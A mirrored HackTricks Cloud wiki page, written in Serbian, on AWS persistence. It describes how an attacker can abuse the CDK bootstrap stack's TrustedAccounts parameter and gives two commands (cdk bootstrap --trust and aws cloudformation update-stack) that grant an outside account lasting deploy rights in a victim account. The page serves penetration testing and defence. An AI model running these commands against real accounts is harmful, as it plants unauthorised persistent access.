gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-04 19:11:41 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
c045e4086153904de5675444c690d06a5ee2ec61
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence/README.md

875 B
Raw Blame History

AWS - Cloudformation Persistence

{{#include ../../../../banners/hacktricks-training.md}}

CloudFormation

Za više informacija pogledajte:

{{#ref}} ../../aws-services/aws-cloudformation-and-codestar-enum.md {{#endref}}

CDK Bootstrap Stack

AWS CDK raspoređuje CFN stack pod nazivom CDKToolkit. Ovaj stack podržava parametar TrustedAccounts koji omogućava spoljnim nalozima da raspoređuju CDK projekte u nalog žrtve. Napadač može zloupotrebiti ovo kako bi sebi obezbedio trajan pristup nalogu žrtve, bilo korišćenjem AWS cli za ponovno raspoređivanje stack-a sa parametrima, bilo korišćenjem AWS CDK cli.

# CDK
cdk bootstrap --trust 1234567890

# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890

{{#include ../../../../banners/hacktricks-training.md}}

Reference in New Issue View Git Blame Copy Permalink